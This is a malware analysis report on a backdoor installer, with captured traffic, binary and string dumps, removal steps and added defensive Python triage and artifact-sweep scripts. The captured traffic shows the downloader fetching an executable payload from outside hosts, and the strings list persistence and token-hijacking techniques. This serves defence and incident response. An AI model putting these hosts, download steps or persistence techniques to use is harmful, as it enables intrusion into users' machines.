data=GKEmlLFmH+z0R/UAztMQSIY1pCQv13e4EQyV/ZcBH5ajeRrOg1vV6mpGKS7rCrZdjI+v5zfQNJPXFqtxv/QG9S+htNvBeB1W/OOBbRMPmmQ1e4Tr6WZ1kwktYiSNqAGk5bzgVs6EhDtXnmhnf8pFQAQ3HET2K0gZ2+vi5hZIjEvdYFNPXnyVZ3gljGzLVAZYp7gdsoSgK1Cq3n3yAJjqODDROzJBesyo8ykcy/mr2y9f+8U8eFM/S+bhqmzrsCbYjNQk/T91YRl5L2tp432Es+91ZdfLOwVNz44OykwYeudDyLPjQHtFOyrU4xzLdAyJYyfwg/TptDaBEEFrWLHgl74KgQPhGtGA1VJvOCeOTnCWqwvPPt/iu4cB/qlW9/mRWRaxPCp27zT7dt99Mp0NF1jkwMJsvqdiPjiXCQUXjnycQv0OYn/oDqTeV2S4JTMcB6UuzPcpaoL1AOMp6t4W36ei0pDJlzXMInk2ZeLI5/cYCavRbE+HjVa9/glii8AgaGFRx1g2V5WLZuwLQvGGmJRMqxbF2a5+fzt73sxtF4h/FZw6RfqCGV2Qxsf5ix4F7j5gkUX0lYzbvapFukCfejTiGQKAi9f+3m4t4q6ADQBpA1rFyez7TwmXsf9KxEqnE+cAs6A4aIFfC1GswZuoQ+DCpDj3Sq9F9XgLBHmBnvtkwmdsBE4XDIIT6D2hwKOjVk56EbKdef&info=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
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 02 Oct 2014 00:37:37 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close{}..
GET /?step_id=1_1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.loversion.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 02 Oct 2014 00:37:58 GMT
Content-Type: text/html
Content-Length: 6726
Connection: close
Content-Disposition: attachment; filename="1_1.txt"..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".e.7.4.
3.0.d.e.0.-.9.f.4.0.-.4.d.7.6.-.a.b.0.8.-.4.0.2.b.c.5.2.3.b.f.2.a."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".0."...I.n.s.t.a.l.l.e.r.I.D.=.
".1.8.1.4.4.5.0.7.9.1.0.7.9.1.9.5.3.8.9."...L.o.c.a.l.e.=.".<.L.a.n
.g.u.a.g.e.>."...D.a.t.e.=.".2.0.1.4./.1.0./.0.2."...T.i.m.e.=.".0.
:.3.7.:.5.8."...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.
n.s.=.".0."...R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.
r.t.e.d.=."."...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.
d.R.e.p.o.r.t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.
S.e.r.v.e.r.]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.
I.n.f.o.]...C.o.u.n.t.r.y.C.o.d.e.=.".I.N."...I.P.A.d.d.r.e.s.s.=.".1.
9.3...1.3.8...2.4.4...2.3.1."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.
d.G.e.n.]...P.e.r.c.e.n.t.a.g.e.=.".3.2.".....[.S.c.r.e.e.n.7.6.]...T.
i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.
t.t.o.n.2.=.".C.a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:.
.t.h.e. .d.o.w.n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.
e.n... .P.l.e.a.s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.
a.g.e. .f.o.r. .f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.c.r.e.
e.n.7.5.]...T.i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.
u.t.t.o.n.2.=.".N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?.<<< skipped >>>
GET /addons/dfndr/180/tpq.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: i1.loverse.org
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Thu, 02 Oct 2014 00:37:14 GMT
Content-Type: application/octet-stream
Content-Length: 4983808
Last-Modified: Wed, 30 Jul 2014 11:39:26 GMT
Connection: close
Accept-Ranges: bytesMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........U...U...
[email protected].....\...P...U.......U...T....L\.X....LF.T....L
C.T...RichU...................PE..L......R.....................0D.....
[email protected]...@...............
...................3..<.......0.A..................pK..E...........
...........................@..........................................
..text............................... ..`.rdata..t-...................
.......@[email protected]... [email protected][email protected]
.................@[email protected]......,[email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U......E......E......E.
[email protected].;E.s..E..E....3E..E..E.i......E....E...U..].U.....
.}..u..e...r.E..E..E..E..E..E..E..E....E.@@.E..E.@@.E..E.H.E..}..v7.E.
....M....;.t%.E.....M....;.}..M.....E......E..E......e...E...U......M.
.E..M...;.u..P.E..8.t6.E......E..}..u.j..M..H....M.........E....E..E..
M.....j..M.."....M..v....E.....U..Q.M...U......M..E..x..r..E..E..E....
E....E..E..E..E..E.P.M.......E...D!H..E.....U..Q.M..M..O....E....t..u.
.....Y.E.....U..Q.M..M..(.....U..j.h..G.d.....Pd.%......,.M.j..M..<<< skipped >>>
The Backdoor connects to the servers at the following location(s):
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s
Upd Inst.exe_1788:
.text
`.rdata
@.data
.rsrc
L$HQSShD`
QSSSSSSh
j.Yf;
_tcPVj@
.PjRW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
load x
qI3[0%s
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
EnumWindows
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USERENV.dll
GetCPInfo
zcÁ
[]@%~!#$^&*()_-?|{}=:/vABmeRfAuIUlkvobQhxXiDGwS02xn6H0U6DZCDHvIATNlPbpqpPOz1QGiLGMhTuXinBPsG7pT5nQKg97KEjbWMXt6UeZQ3NNhWSkbs0PFUOXeu7qBezPy6gssSHDhGJ
1JyR4HrFONIVXjDC3ceRt4KW5E58D1BdAX9AHUEsxBGQrkj2l4p0wTdBiE7AyjeDgvWK9VVq41NX09K0nnoHzGbVXNQNdpxZbKzI7sigiVjIeNRe8 D7f5nzkjv R2ij
DJG8iVLHF5/4R27dp4BElIKbN/KYkRKY7AbogR38oQlq2txqkyi1sKMR3UpmxdJxPe0HZ/DdKh6G/lUlRZH1/xerK5e7xun94PtKXn1pSjcmK1a5DK1XC7msG9iESCW1
4HrFQ J0KEY8b4oBZWCCb9J2PMsVPOlaLQ9moQOQoSEHORL 9OxkswsK3bpiEZ4fOxjain0oLy40kYhnKKs0deJGnSyjex/VA9ibPUrxX7Gs/Ay7bzRJsCrHQSGYORaa
4H5dKFe wAXj6ynku/N94HrFR273xIi0IAGzz55vz8HIL 0 apXImYhvAzmlpZRXSjcmEeDdVg4C 9RaF0sQlNnsjMyL5da53 cNpd0KlFJb22sElQvaM4mT8PvEN057
20120606
:2RP.aN
vcrT"?y
.D@%D~
@%.wQ
PU.xV;E
f.yrf3
iZ.pR
GW%Cw
<-r}?
:sB-.hK
H.gNQB#
.Ae>W
%.av s,
%-K}E
vH.ye
2%x/z
d{|%F.UHnf(
pmva'.Prg
g5Zy%X
.LGhx
sQln<uYTN
lŒ2s
Ä{d`D%Cs2
%o.kE
.gifUl
dd%C#
7.ykC(
a*W*%u?F
%U_;p
c:\documents and settings\all users\application data\showappit\upd inst\Upd Inst.exe
?456789:;<=
!"#$%&'()* ,-./0123
'()*#$%&
>?:;<=9876540123,-./
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<!--Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><!--Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
portuguese-brazilian
%s\%s
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
_dlsys->%s is null
ProductSupport
log.txt
AG%d%s
access out of bounds index %d not in 0..%d
UInfoURL
E:%u LookupPrivValue
E:%u AdjustTokenPriv
AdjustTokenPriv() return: %u (0==success)
E:%u OpProcTkn
(lpCmdLine==NULL)
result=%s
E: empty key; ignored
Except 0x%0.8x @0x%0.8x (%.30s) hmod=0xx
E:%d enc
E OpenPT: %x
E EES: %x
PendingFileRenameOperations
PendingFileRenameOperations2
FileRenameOperations
c:\temp\winnie-pooh\piglet-rules.tmp
DeleteFile('%s') OK (not exist)DeleteFile('%s') E1:%d;E2:%dDeleteFile('%s') OK (scheduled; immediate E:%d); pending ops found:%dDeleteFile('%s') OK'%.256s~': E:%d
C:\Users
C:\Doc
\qmgr.dll
major version %d looks bogus
minor ver %d looks bogus
s-pack %d looks bogus
E:%d creating Runtime; OS-ver=%d
DLL LogPath='%s'
DL%d_%s
E:%d create HTML document; OS-ver=%d, IE-ver=%s
E:%d bind runtime to HTML window; OS-ver=%d, IE-ver=%s
E:%d LoadScr(BOOT)
E:%d LoadScr(JSO)
FROMAGENT_URLMON_IS_PRIMARY
FROMAGENT_NO_FALLBACK_ON_HTTP_ERRORS
E:%x execScript(JSON)
E:%x execScript(BOOTSTRAP)
execScript(BOOTSTRAP) done; m_eExitCode not set, assumed %d (E_SUCCESS=%d)
execScript(BOOTSTRAP) done; EC:{%d,%d}execScript(BOOTSTRAP): script ended: VT_%d (VT_INT=%d)
worker about to end - calling spRuntime.Release();
%s-%s
Global\%s
E:%d CreateEvent '%s'
/schedule /profile "%s"
E:%d installing task '%.256s~'
E:%d removing task '%.256s~'
SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
E:%d open BITS registry at '%s'
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): Adjusting BITS FGND retries to %d (in registry)
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): BITS FGND retries (in registry) = %d
Refresh enth set to %d sec
%ds[to-wait]-%ds[since-last];keep>0 ==>%ds
Waiting %ds
"%s" /%s "%s"
E appdaemon.Start '%.256s~'
%d.%d.%d.d
: E:%d open agent key '%.50s>'
E:%d delete module key '%.256s~'
: InitializeSecurityDescriptor failed; Error %u
: SetSecurityDescriptorDacl failed; Error %u
%s\%s\%s
E:%d open agent key'%.256s~'
WriteRegistryProfile E open module key '%.50s>' E:%d
WriteRegistryProfile E create section key '%.50s>' E:%d
WriteRegistryProfile E write section='%.50s>' value='%.50s>'; E:%d
['%.50s>']('%.50s>')<=='%.50s>'; E:%d; %s: {sec'%.50s>',key'%.50s>'} E val-len %d>%d truncated['%.256s~']('%.256s~')='%.256s~'; E %d too long, max=%dE:%d start worker watchdog
CAgentModule::WatchdogThreadMain: Watchdog active. no event; waiting %d sec
.ini.bak
(%s,%s): E:%d open key
E:%d CoCreateInst
E:%d: ITaskSched::NewWItem
SetApplicationName E:%d
E:%d SetParameters
SetWorkingDirectory E:%d
SetAccountInformation E:%d
SetComment E:%d
SetFlags E:%d
CreateTrigger E:%d
SetTrigger E:%d
SetMaxRunTime E:%d
QueryInterface(IPersistFile) E:%d
E:%d save task in scheduler (IPersistFile::Save)
E:%d activate task (ITask::Run)
CoCreateInstance TaskScheduler failed %d
ITaskScheduler::Delete failed %d
E:%d OpSCMan
OpenService failed %d
ChangeServiceConfig failed %d
E:%d GetUserName
: E:%d LoadUserProfile (hTok=0x%x)
E:%d CreateEnvironmentBlock (hTok=0x%x)
"%s" %s
E:0xx CreateProcessAsUser; cannot start '%.256s~'; attempt CreateProcess
E:0xx CreateProcess; cannot start worker
E:0x%x CreateProcess OK but (hProcess==NULL); cannot start worker
: PHY %dmb<%dmb; E start command'%.256s~'
: VIRT %dmb<%dmb; E start command'%.256s~'
E:0x%0x WTSQUserTken
: E:0x%0x DupToken(Impers); continue;
: E:0x%0x DupToken(Ident); continue;
: E:0x%0x GetTokenInfo; continue;
E:0x%0x ImpersLOU
non admin user, os-ver=%d ==> do not execute
E:%d FndNxtFile: source is a folder
DeleteDirectory('%s') OK
DeleteDirectory('%s') E:%d
RemoveFileTree('%s') OK
RemoveFileTree('%s') E:%d
E:%d '%.256s~'->'%.256s~'
E:%d encrypting; cont unencrypted
E:%d Prepare()
ShellExecuteEx
E:%d (info.hInstance=%d)
Notepad.exe
Software\Microsoft\Windows\Current
ddeexec
.aHTML
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
ddd
%d.%d.0.%d
URLInfoAbout
URLUpdateInfo
C:\Windows\System32\msiexec.exe
PID%d.TID%d
CEventLogger::LogEventV: vsprintf error %d with pszFormat='%s'
E:%d create memlog
{"entry_counter":"%u","entry_time":"%s","entry_type":"%llu","message":"%.256s"},file not reported
JScr E:'%.50s>' F:'%.30s>',L:%d
E:NULL desc) (F='%.30s>',L=%d)
JScr: ExitP(%d)
JScr: ExitP(no code=%d)
E:%d data='%.256s~'
E:%d GetDisID'%.256s~'
ver=%d.%d.%d(%s)
os_id=%d.%d.%d sp%d
aid=%s
hid=%s (old crc32=0xx)
timestamp now=0x%s
IPv4_long=%d 0xx
E:%d folder '%s'
killed %d '%.256s~'
E:%d copy to '%.256s~'
E:%d ShellExec '%.256s~''%.256s~'
E:%d CreateProc '%.256s~'
E:%d GetExitCodProc(pid=%d)
E:%d inst to '%.256s~'
/instal E not adm. (OSVer=%d)
/install E not admin. (OSVer=%d) Cannot run
/Install <path> E:%d; continue as worker to report
/inst E not admin. (OSVer=%d)
/install E:%d schedule logon task (OSVer=%d); continue as worker to report
/install OK, but uninstaller(this=0x%x) E:%d.
/install OK. (will be reported by self)
/install E:%d. (is reported by parent)
/schedule E not admin. (OSVer=%d) Cannot run
New Scheduler v%d.%d.%d %s
Scheduler exits C:0x%x
/uninstall requires admin privileges. (OSVer=%d) Cannot run
Disable OK; %d killed
UNINST REPORT STARTS
UNINST REPORT ENDS
New Wker v%d.%d.%d %s
Worker exits C:0x%x
E:0x%x create: '%.256s~'
(%s,%s): OK
(%s,%s): E:%d setting value
E:%d open key '%.256s~'
RegDeleteKeyEx
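The strings above are the format strings and registry paths left in the sample's agent module, and they give away its capabilities before any dynamic analysis: Task Scheduler persistence (ITaskSched, IPersistFile::Save, ITask::Run, the /schedule switch), a BITS foreground-retry tweak written to the registry, CreateProcessAsUser after WTSQueryUserToken / token duplication, an admin-rights check, a Global\ named object, and a JScript bootstrap executed through an IE HTML document. The following is an added example (not part of the Lavasoft report and not the sample's code) that tags a constructed subset of these strings with the capability each implies and collects the command-line switches; the tag names and regexes are the author's own choice, and a real run would feed the full `strings` output of the unpacked binary instead of the embedded list.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: a subset of the strings listed in the report, copied verbatim.
SAMPLE_STRINGS: List[str] = [
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\BITS",
    "CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): Adjusting BITS FGND retries to %d (in registry)",
    "E:%d save task in scheduler (IPersistFile::Save)",
    '/schedule /profile "%s"',
    "/install E:%d schedule logon task (OSVer=%d); continue as worker to report",
    "/Install <path> E:%d; continue as worker to report",
    "/uninstall requires admin privileges. (OSVer=%d) Cannot run",
    "E:0xx CreateProcessAsUser; cannot start '%.256s~'; attempt CreateProcess",
    "E:0x%0x WTSQUserTken",
    "E:0x%0x ImpersLOU",
    "non admin user, os-ver=%d ==> do not execute",
    r"Global\%s",
    "E:%d create HTML document; OS-ver=%d, IE-ver=%s",
    "E:%x execScript(BOOTSTRAP)",
    "E:%d LoadScr(JSO)",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    "ChangeServiceConfig failed %d",
    "killed %d '%.256s~'",
    r"C:\Windows\System32\msiexec.exe",
]

# (tag, regex) pairs chosen by the author of this example; the tag is the capability
# a string of that shape implies. Patterns are searched, not anchored, unless marked.
RULES: List[Tuple[str, str]] = [
    ("scheduled-task persistence",
     r"ITaskSched|IPersistFile::Save|ITask::Run|/schedule\b|schedule logon task"),
    ("BITS registry tampering", r"CurrentVersion\\BITS|BITS FGND retries"),
    ("token theft / run-as-logged-on-user",
     r"CreateProcessAsUser|WTSQUserTken|DupToken|ImpersLOU"),
    ("admin-rights check", r"not adm|non admin|requires admin"),
    ("global named object (single-instance / IPC)", r"^Global\\"),
    ("IE script-engine bootstrap", r"execScript|LoadScr|create HTML document|JScr"),
    ("service reconfiguration", r"ChangeServiceConfig|OpSCMan"),
    ("Uninstall key manipulation", r"CurrentVersion\\Uninstall"),
    ("process termination", r"^killed %d"),
]

# A switch is "/" followed by letters, not preceded by a word char, "/" or "." so
# that paths, URLs and "%s /%s" format fragments are not picked up.
SWITCH_RE = re.compile(r"(?<![\w/.])/[A-Za-z]+")


def triage(strings: List[str]) -> Dict[str, List[str]]:
    """Map each capability tag to the strings that triggered it."""
    hits: Dict[str, List[str]] = {}
    for s in strings:
        for tag, pattern in RULES:
            if re.search(pattern, s):
                hits.setdefault(tag, []).append(s)
    return hits


def untagged(strings: List[str]) -> List[str]:
    """Strings no rule covers; worth reading by hand rather than ignoring."""
    return [s for s in strings if not any(re.search(p, s) for _, p in RULES)]


def switches(strings: List[str]) -> List[str]:
    """Distinct command-line switches, lower-cased so /Install and /install merge."""
    found = set()
    for s in strings:
        found.update(m.lower() for m in SWITCH_RE.findall(s))
    return sorted(found)


if __name__ == "__main__":
    for tag, evidence in triage(SAMPLE_STRINGS).items():
        print(f"{tag}: {len(evidence)} string(s)")
    print("switches:", switches(SAMPLE_STRINGS))
    print("untagged:", untagged(SAMPLE_STRINGS))
```

The switch list is the quickest win here: /install, /uninstall, /schedule and /profile tell an analyst how to drive the agent in a sandbox (and that /install and /uninstall refuse to run without admin rights), while the untagged bucket keeps the regex set honest by surfacing whatever it did not classify.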
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
putfu.exe:1100
usetup.exe:644
rundll32.exe:1252
rundll32.exe:1972
Upd Inst.exe:1788
Upd Inst.exe:212
%original file name%.exe:1936
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Program Files%\Assistant.dll (264574 bytes)
%Program Files%\AssistantSvc.dll (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
%Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\Upd Inst.exe (26080 bytes)
%WinDir%\Tasks\Upd Inst-S-3301306948.job (648 bytes)
%Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\3301306948.ini (36300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].txt (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (4 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuE7C96BC7.dll (2569 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.dat (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AE3B6594.dat (16424 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (2 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.usetup.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin9E1A.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.putfu.exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1_1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\efd952ab4bdc43976f26649917fafe30.log (1671022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\1_1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
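Two caveats a responder should apply to the list above before sweeping other hosts: the process IDs come from one sandbox run and mean nothing elsewhere (match on image name, and do not kill rundll32.exe by name, since it is a Windows binary the sample only hosts code in), and the placeholders reflect the Windows XP layout the sample was analysed on. The following is an added example (not part of the Lavasoft report) that expands the report's placeholders for either the XP or the Vista-and-later layout, wildcards the parts that are assumed to vary per install, and checks a host read-only. The assumptions are the author's: the number in "Upd Inst-S-3301306948.job" and "3301306948.ini" is treated as a per-install identifier, and the "1936" in "down.1936.*" as the PID of the original process, since the report shows %original file name%.exe running as PID 1936.

```python
import fnmatch
import glob
import os
from typing import Dict, List, Optional

# Artifacts from the report's removal list, placeholders kept as written.
# Assumption (not stated by the report): the numeric install ID and the PID
# embedded in the names differ per victim, so they are wildcarded.
REPORT_ARTIFACTS: List[str] = [
    r"%Program Files%\Assistant.dll",
    r"%Program Files%\AssistantSvc.dll",
    r"%Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\Upd Inst.exe",
    r"%Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\*.ini",
    r"%WinDir%\Tasks\Upd Inst-S-*.job",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\down.*.usetup.exe",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\down.*.putfu.exe",
]

# Image names the sample itself drops. rundll32.exe is deliberately absent.
MALICIOUS_IMAGE_NAMES = {"putfu.exe", "usetup.exe", "upd inst.exe"}


def expand(report_path: str, env: Dict[str, str]) -> str:
    """Translate the report's placeholders into a concrete path for the given environment.

    Longest placeholders are substituted first. On Vista+ the All Users
    Application Data folder is %ProgramData%; on XP it is
    %ALLUSERSPROFILE%\Application Data.
    """
    all_users_appdata = env.get("ProgramData") or (
        env.get("ALLUSERSPROFILE", r"C:\Documents and Settings\All Users") + r"\Application Data"
    )
    user_temp = env.get("TEMP") or env.get("TMP") or (
        env.get("USERPROFILE", r"C:\Documents and Settings\Default User") + r"\Local Settings\Temp"
    )
    substitutions = [
        (r"%Documents and Settings%\All Users\Application Data", all_users_appdata),
        (r"%Documents and Settings%\%current user%\Local Settings\Temp", user_temp),
        (r"%Program Files%", env.get("ProgramFiles", r"C:\Program Files")),
        (r"%WinDir%", env.get("SystemRoot") or env.get("windir", r"C:\WINDOWS")),
    ]
    for placeholder, value in substitutions:
        report_path = report_path.replace(placeholder, value)
    return report_path


def match_artifacts(patterns: List[str], candidates: List[str]) -> List[str]:
    """Case-insensitive (NTFS-style) wildcard match of candidate paths against patterns."""
    lowered = [p.lower() for p in patterns]
    return [c for c in candidates if any(fnmatch.fnmatchcase(c.lower(), p) for p in lowered)]


def suspicious_processes(running_image_names: List[str]) -> List[str]:
    """Running image names that belong to the sample, compared case-insensitively."""
    return [n for n in running_image_names if n.lower() in MALICIOUS_IMAGE_NAMES]


def sweep_host(env: Optional[Dict[str, str]] = None) -> List[str]:
    """Glob the live filesystem for the expanded artifact patterns (read-only)."""
    env = dict(os.environ) if env is None else env
    found: List[str] = []
    for pattern in REPORT_ARTIFACTS:
        found.extend(glob.glob(expand(pattern, env)))
    return found


if __name__ == "__main__":
    for path in sweep_host():
        print("artifact present:", path)
```

Run on the suspect host it prints any matching paths and nothing else; deletion and process termination are left to the responder, who should also pull the .job file and the .ini before removing them, since they carry the install ID and the agent's profile.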